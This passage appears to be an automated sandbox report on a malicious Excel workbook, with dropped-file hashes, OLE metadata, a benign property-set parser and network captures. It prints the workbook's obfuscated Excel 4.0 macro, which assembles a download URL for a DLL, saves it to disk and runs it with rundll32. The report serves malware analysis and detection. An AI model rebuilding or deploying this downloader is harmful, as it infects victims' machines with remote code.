                                                                  Entropy (8bit):7.900025161375159
                                                                  Encrypted:false
                                                                  SSDEEP:1536:/gdveaQUVxucuv4KrAeWvibO/WGHKlMVGoIahaDHTU6hryF70qQrRVb:/gdve/+xucCbrAiC/W2K2sTU2yF70q2Z
                                                                  MD5:56BF9CC2186FA1C4B6EDC49112263D23
                                                                  SHA1:BC765F415440E96180F9E7C20C46002006C2AB78
                                                                  SHA-256:450E7209B039580692E6C9AD24445B2B0C254BED96EFB6D8439101D05C8BF326
                                                                  SHA-512:F68BA37FDA4F1DDFC7511EE12E0E87C988B11E1D78DB939C44CD49D75106827479441435AA68F33F9193843684A402AF96196CADEEAE15D39FBF2470CBB074FA
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Mon May 3 22:13:16 2021, atime=Mon May 3 22:13:16 2021, length=8192, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):904
                                                                  Entropy (8bit):4.6783357791319
                                                                  Encrypted:false
                                                                  SSDEEP:12:8SsXU0cduCH2POpED4SfupuMe+WrjAZ/DYbD8q5SeuSeL44t2Y+xIBjKZm:8Sr/m159AZbcD8+7aB6m
                                                                  MD5:6E48B421B184EF3D46F06680C9C67A37
                                                                  SHA1:05BDFE2883F349EE93D0D2C2DFEDB09721068365
                                                                  SHA-256:36B99B62DCE47E6EB395E7636EE52A64CD3A50CAF609FA9C39952C3FA97B3A52
                                                                  SHA-512:39730F908C9823FEAA8C74FDF8E7150603FB09925B0CECCF6FFC1B9B328D9EED2D73A8750037DC1A9A86E2DB02E1B7D1937F75E4B7028E0F66E658F00757E41E
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Documents_111651917_375818984.LNK
                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:51 2020, mtime=Mon May 3 22:13:16 2021, atime=Mon May 3 22:13:16 2021, length=127488, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):2300
                                                                  Entropy (8bit):4.719627546783625
                                                                  Encrypted:false
                                                                  SSDEEP:48:8X4/Qp7/R3uFTkB6pX4/Qp7/R3uFTkB6:8I/ZOKI/ZO
                                                                  MD5:2072AF3584112E066DF89AF3000F028F
                                                                  SHA1:F8BD1B3741503B6F6DA80FF64D6D41BB6B062541
                                                                  SHA-256:E07863A4D3DA52366376DEBA7AAB1A9EF139406AA6DDDBCABBADE8F94A46491D
                                                                  SHA-512:2B54BE96FF87C0851D7365E90E4440C7C488F9200381C36DB28404A5952CB7C99BF77912E00DEF0BC9F625333F5F210C8092B5425958BA370F27D86A6E0CDE47
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):140
                                                                  Entropy (8bit):4.747564355627999
                                                                  Encrypted:false
                                                                  SSDEEP:3:oyBVomMU9UjaWedPFo5S/9UjaWedPFomMU9UjaWedPFov:dj6CUXCPFySlUXCPF6CUXCPFy
                                                                  MD5:F76CD1EBA58FCA55D502A3D2D9E0E110
                                                                  SHA1:661819A3CAAC115DA23D3461C097EAE0E4C4053A
                                                                  SHA-256:C8BD2E44E413B9A30E0EA6167F7E597C5FC6FE5FFCDBA3BE4281F75FB4469EF9
                                                                  SHA-512:A6298F269F1C478402C91EDD92CF8602CFB87F74D0C6061B9D8FDA33B5EBC43E498717E0F7D7125AA894C810D491470661A3F1F79A7E5F09921944F29BF955CF
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: Desktop.LNK=0..[xls]..Documents_111651917_375818984.LNK=0..Documents_111651917_375818984.LNK=0..[xls]..Documents_111651917_375818984.LNK=0..
                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                  File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                  Category:dropped
                                                                  Size (bytes):22
                                                                  Entropy (8bit):2.9808259362290785
                                                                  Encrypted:false
                                                                  SSDEEP:3:QAlX0Gn:QKn
                                                                  MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                  SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                  SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                  SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                  Malicious:false
                                                                  Preview: ....p.r.a.t.e.s.h.....
                                                                  C:\Users\user\Desktop\CDA40000
                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                  Category:dropped
                                                                  Size (bytes):205130
                                                                  Entropy (8bit):6.247544974815653
                                                                  Encrypted:false
                                                                  SSDEEP:6144:z8rmOAIyyzElBIL6lECbgB+P5Nm7TPUSydZ6g6j8rmOAIyyzElBIL6lECbgB+P52:j6g6o
                                                                  MD5:43C68CBD7DED1B36B92E11C1AD2872FD
                                                                  SHA1:9ACF44830C4A3B140576EF005470E4F50C915998
                                                                  SHA-256:1C1BDFC952C61C8837A724B3B8E3E3527DFDE72D810E2754286A1F32C6D4DC7C
                                                                  SHA-512:CB2B9E93BBFE8A7627A7313698FF10560BE67F30B1016E1686DF6EB50F94F64B35177385F9738D8CD04D2D7C9ACBA6AAE9A2FFC7037649BDB0CA043BCE130EB8
                                                                  Malicious:false
                                                                  C:\Users\user\bsdnbsej.dbw
                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:modified
                                                                  Size (bytes):525312
                                                                  Entropy (8bit):5.949946336029269
                                                                  Encrypted:false
                                                                  SSDEEP:12288:ga6g2O+gAaY9cc40TeAjaRoA5FZuY+F4:gZlOBAaY9RCy05FZuYq
                                                                  MD5:B80F4B91C29963DF1CFD0D0A8A30E5C6
                                                                  SHA1:09C6AE06E0C10672D91F6850118F41DC3DD66E72
                                                                  SHA-256:0A87BD3BB60320B21E493341B70519AF4E46C2E969038D6D89B536CD37AA11D9
                                                                  SHA-512:BDCD3009ED3499055CF73EF1C4DD4BD0942C8B81C395CECF3C9DA790E4867055059D10B05451476D7DA98BBBF472C40536E7A09158B5DE92C57A74E36396D10C
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                  Joe Sandbox View:
                                                                   • Filename: Documents_111651917_375818984.xls, Detection: malicious
                                                                   • Filename: Documents_95326461_1831689059.xls, Detection: malicious
                                                                   • Filename: Documents_95326461_1831689059.xls, Detection: malicious
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........f].5].5].5C.45M.5C."5..5T.25Z.5].5..5C.%5A.5C.35\.5C.55\.5C.05\.5Rich].5........PE..L......`...........!.....................................................................@.........................@...T...<...P.......x.......................d.......................................@...............<............................text............................... ..`.data...d...........................@....rsrc...x...........................@..@.reloc........... ..................@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                  Static File Info

                                                                  General

                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 3 14:24:59 2021, Security: 0
                                                                  Entropy (8bit):3.330043919784793
                                                                  TrID:
                                                                  • Microsoft Excel sheet (30009/1) 78.94%
                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                  File name:Documents_111651917_375818984.xls
                                                                  File size:300032
                                                                  MD5:72526a505496a9b7da9a6c9651dbda5e
                                                                  SHA1:84cf963666314eee0d8ad1ef09e5462a66e3ccbf
                                                                  SHA256:3c20530c13d6736ec705786d1694052b2abf42bf87d3bbc359ea95b343fcf681
                                                                  SHA512:ca1ac0057d9ede44a1d9ecf9f854140a39b9b626895c85f34fbf973b8ee749fa2fbd836bc882e9ca2fab7929a9aecb790d7e795ea55a32ce66d6ee1d078afe46
                                                                  SSDEEP:6144:KcPiTQAVW/89BQnmlcGvgZ7r3J8b5IPJK++3ey:uqy
                                                                  File Content Preview:........................>.......................H...........................C...D...E...F...G..................................................................................................................................................................

                                                                  File Icon

                                                                  Icon Hash:74ecd4c6c3c6c4d8

                                                                  Static OLE Info

                                                                  General

                                                                  Document Type:OLE
                                                                  Number of OLE Files:1

                                                                  OLE File "Documents_111651917_375818984.xls"

                                                                  Indicators

                                                                  Has Summary Info:True
                                                                  Application Name:Microsoft Excel
                                                                  Encrypted Document:False
                                                                  Contains Word Document Stream:False
                                                                  Contains Workbook/Book Stream:True
                                                                  Contains PowerPoint Document Stream:False
                                                                  Contains Visio Document Stream:False
                                                                  Contains ObjectPool Stream:
                                                                  Flash Objects Count:
                                                                  Contains VBA Macros:True

                                                                  Summary

                                                                  Code Page:1251
                                                                  Last Saved By:5
                                                                  Create Time:2006-09-16 00:00:00
                                                                  Last Saved Time:2021-05-03 13:24:59
                                                                  Creating Application:Microsoft Excel
                                                                  Security:0

                                                                  Document Summary

                                                                  Document Code Page:1251
                                                                  Thumbnail Scaling Desired:False
                                                                  Contains Dirty Links:False

                                                                  Streams

                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                  General
                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                  File Type:data
                                                                  Stream Size:4096
                                                                  Entropy:0.338488976625
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S h e e t 1 . . . . . S h e e t 5 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . .
                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 91 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 06 00 00 00
                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                  General
                                                                  Stream Path:\x5SummaryInformation
                                                                  File Type:data
                                                                  Stream Size:4096
                                                                  Entropy:0.247889866731
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00
                                                                  Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 288088
                                                                  General
                                                                  Stream Path:Book
                                                                   File Type:Applesoft BASIC program data, first line number 8 (a libmagic false match: the raw bytes below open with a BIFF BOF record, id 0x0809, length 8, version 0x0500, i.e. an Excel 5.0/95-format workbook stream, which is also why the stream is named Book rather than Workbook)
                                                                  Stream Size:288088
                                                                  Entropy:3.3163372394
                                                                  Base64 Encoded:True
                                                                  Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . S h e e t 3 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . > . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X
                                                                  Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
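
                                                                   The property-set bytes quoted for the two \x05...Information streams are where tooling reads the code page, the sheet titles and the heading pairs (the "Excel 4.0" heading visible in the DocumentSummaryInformation ASCII dump is the classic marker of an XLM macro sheet). As an added example that is not part of the report, the stand-alone parser below walks the 128 Data Raw bytes shown above for \x05DocumentSummaryInformation: stream header, FMTID, OS version, the property ID/offset table, and every value that fits inside the preview. It assumes only the [MS-OLEPS] layout; the bytes are copied from the report, and because the preview ends inside TitlesOfParts, that property and HeadingPairs are reported as truncated rather than guessed.

```python
import struct
import uuid

# Constructed input: the 128 "Data Raw" bytes of \x05DocumentSummaryInformation
# exactly as listed in the report above. Nothing past byte 128 is known here.
DOCSUMMARY_RAW = bytes.fromhex(
    "fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 "
    "d4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 "
    "10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 91 00 00 00 "
    "02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 "
    "1e 10 00 00 06 00 00 00"
)

VT_I2, VT_BOOL, VT_LPSTR, VT_VECTOR = 0x02, 0x0B, 0x1E, 0x1000

# DocumentSummaryInformation property IDs (PIDDSI) that the report lists.
PIDDSI = {0x01: "CodePage", 0x0B: "ScaleCrop", 0x0C: "HeadingPairs",
          0x0D: "TitlesOfParts", 0x10: "LinksDirty"}


def decode_value(raw, pos, codepage):
    """Decode one TypedPropertyValue at pos. Returns (value, complete); a value
    that runs past the end of raw comes back partial with complete=False
    instead of raising, because sandbox previews are cut at a fixed length."""
    try:
        vt = struct.unpack_from("<I", raw, pos)[0]
        if vt == VT_I2:
            return struct.unpack_from("<h", raw, pos + 4)[0], True
        if vt == VT_BOOL:                       # VARIANT_BOOL: 0xFFFF is TRUE
            return struct.unpack_from("<H", raw, pos + 4)[0] == 0xFFFF, True
        if vt == VT_VECTOR | VT_LPSTR:          # e.g. TitlesOfParts
            count = struct.unpack_from("<I", raw, pos + 4)[0]
            items, p = [], pos + 8
            for _ in range(count):
                n = struct.unpack_from("<I", raw, p)[0]
                s = raw[p + 4:p + 4 + n]
                if len(s) < n:
                    return items, False
                items.append(s.rstrip(b"\0").decode(codepage, "replace"))
                p += 4 + ((n + 3) & ~3)         # CodePageString is 4-byte padded
            return items, True
        return ("unsupported VT", hex(vt)), True
    except struct.error:                        # type tag or length cut off
        return None, False


def parse_property_set(raw):
    """Parse the PropertySetStream header, FMTID and the first section's
    property table, decoding whatever fits inside raw."""
    byte_order, version, sys_id = struct.unpack_from("<HHI", raw, 0)
    if byte_order != 0xFFFE or version != 0:
        raise ValueError("not a version-0 OLE property set stream")
    fmtid = uuid.UUID(bytes_le=raw[28:44])      # GUID stored little-endian
    sect_off = struct.unpack_from("<I", raw, 44)[0]
    sect_size, count = struct.unpack_from("<II", raw, sect_off)
    table = [struct.unpack_from("<II", raw, sect_off + 8 + 8 * i) for i in range(count)]
    codepage, props, truncated = "cp1252", {}, []
    for pid, off in table:
        name = PIDDSI.get(pid, f"pid_0x{pid:x}")
        value, complete = decode_value(raw, sect_off + off, codepage)
        if pid == 0x01 and complete:            # strings after this use it
            codepage = f"cp{value}"
        if complete:
            props[name] = value
        else:
            truncated.append(name)
    return {
        "fmtid": str(fmtid),
        # OSVersion: low byte = major, next byte = minor, high word = kind (2 = Win32)
        "os_version": (sys_id & 0xFF, (sys_id >> 8) & 0xFF),
        "os_kind": sys_id >> 16,
        "section_size": sect_size,
        "property_ids": [pid for pid, _ in table],
        "properties": props,
        "truncated": truncated,
    }


if __name__ == "__main__":
    import pprint
    pprint.pprint(parse_property_set(DOCSUMMARY_RAW))
```

On the report's bytes this yields the DocumentSummaryInformation FMTID {D5CDD502-2E9C-101B-9397-08002B2CF9AE}, OS kind 2 with version 6.2 and code page 1251 (matching the "Os: Windows, Version 6.2, Code page: 1251" in the file-type line), ScaleCrop and LinksDirty both FALSE, and TitlesOfParts/HeadingPairs flagged as truncated; a full copy of the stream would let the same parser return the six sheet names and the heading pair that carries the "Excel 4.0" string.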

                                                                  Macro 4.0 Code

                                                                   Formula cells, first dumped run, one cell per line (the dump ran the cells together and CSV-escaped every quote as ""):
                                                                   =EXEC(Sheet2!BS64&Sheet2!BW70&Sheet2!BW71&Sheet2!BT63&Sheet2!BT64&Sheet2!BT65&Sheet2!BT66)
                                                                   =RUN(Sheet2!BI14)
                                                                   =IF(2+2+6<1,"gdf4gfdg5f1d8g1fd58g48fd415f","h4j4hg8k1j5g4d5f45df4jh5y1")
                                                                   =ASIN(9887455421254)
                                                                   =ACOS(154151541)
                                                                   =IF(2+2+6<1,"gdf4gfdg5f1d8g1fd58g48fd415f","h4j4hg8k1j5g4d5f45df4jh5y1")
                                                                   =ASIN(9887455421254)
                                                                   =ACOS(154151541)
                                                                   =IF(2+2+6<1,"gdf4gfdg5f1d8g1fd58g48fd415f","h4j4hg8k1j5g4d5f45df4jh5y1")
                                                                   =ASIN(9887455421254)
                                                                   =ACOS(154151541)
                                                                   =IF(2+2+6<1,"gdf4gfdg5f1d8g1fd58g48fd415f","h4j4hg8k1j5g4d5f45df4jh5y1")
                                                                   =ASIN(9887455421254)
                                                                   =ACOS(154151541)

                                                                   Non-empty cells of the sheet grid, in dump order (the original is a comma-separated cell grid; empty cells omitted, values separated by two spaces; a quoted value contains a comma or a trailing space):
                                                                   =HALT()  ht  tps://  otusmail.com/b/vegas.  dll  R  o  L  w  n
                                                                   ..\bsdnbsej.dbw  L  JJ  run  ",Plu"  CC  gin  D  Init  M  n  l  dl  o  "l32 "  a  d  BB  o  F  i  e  l

                                                                   Formula cells, second dumped run, one cell per line:
                                                                   =COSH(5454645654654650)
                                                                   =ACOS(5.46546546884684E+22)
                                                                   =ASIN(64868468684684600)
                                                                   =COSH(68465454284548)
                                                                   =ACOS(5484512167481510000)
                                                                   =ASIN(15648451864516800)
                                                                   =COSH(4515155354615610000)
                                                                   =CALL(Sheet5!BF57&Sheet2!BP64&Sheet2!BN68&"o"&Sheet2!BN69,Sheet5!BC27&Sheet2!BP48&Sheet2!BP49&Sheet2!BQ66&Sheet2!BM49&Sheet2!BM50&Sheet2!BM51&Sheet2!BQ70&Sheet2!BQ71&Sheet2!BQ72&Sheet2!BQ73&"T"&Sheet2!BM77&Sheet2!BM78&Sheet2!BM79&Sheet2!BM80&Sheet2!BQ79&Sheet5!BB54,Sheet2!BR64&Sheet2!BR65&Sheet2!BR75,0,Sheet2!BU37&Sheet2!BU38&Sheet2!BU39&Sheet2!BU40,Sheet2!BT63,0,0)&""&""&""&""&""&""&""&""&""&""&""&""
                                                                   =RUN(Sheet4!AS11)
                                                                   =ASIN(4451548415151)
                                                                   =COSH(5454645654654650)
                                                                   =ACOS(5.46546546884684E+22)
                                                                   =ASIN(64868468684684600)
                                                                   =COSH(68465454284548)
                                                                   =ACOS(5484512167481510000)
                                                                   =ASIN(15648451864516800)
                                                                   =COSH(4515155354615610000)
                                                                   =ACOS(1.15154134535435E+24)&""&""&""&""&""

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                   Timestamp                            Source Port  Dest Port  Source IP      Dest IP
                                                                   May 4, 2021 01:13:17.530528069 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:17.584604979 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.584762096 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:17.595021009 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:17.647407055 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.651242018 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.651288033 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.651359081 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:17.651406050 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:17.698021889 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:17.751879930 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.752125025 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.752242088 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:17.770627975 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:17.824875116 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.954245090 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.954268932 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.954291105 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.954303026 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.954319000 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.954338074 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.954355001 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.954375982 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.954493999 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:17.954747915 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:17.955495119 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.955513000 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.955640078 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:17.956784010 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.956809998 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.956892967 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:17.958071947 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.958180904 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:17.976916075 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.976938009 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:17.977184057 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.012197018 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.012211084 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.012425900 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.012516975 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.012545109 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.012674093 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.013798952 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.013823032 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.013906002 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.015031099 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.015055895 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.015130997 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.016295910 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.016315937 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.016417980 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.017559052 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.017585039 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.017682076 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.018790007 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.018809080 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.018903017 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.020051003 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.020067930 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.020150900 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.021316051 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.021334887 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.021522999 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.022574902 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.022599936 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.022696972 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.023829937 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.023926020 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.035006046 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.035022974 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.035146952 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.035361052 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.035377979 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.035474062 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.035547972 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.069513083 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.069534063 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.069732904 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.069809914 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.069828033 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.069938898 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.070489883 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.070513964 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.070579052 CEST  49709        443        192.168.2.4    104.21.64.132
                                                                   May 4, 2021 01:13:18.071753025 CEST  443          49709      104.21.64.132  192.168.2.4
                                                                   May 4, 2021 01:13:18.071779966 CEST  443          49709      104.21.64.132  192.168.2.4
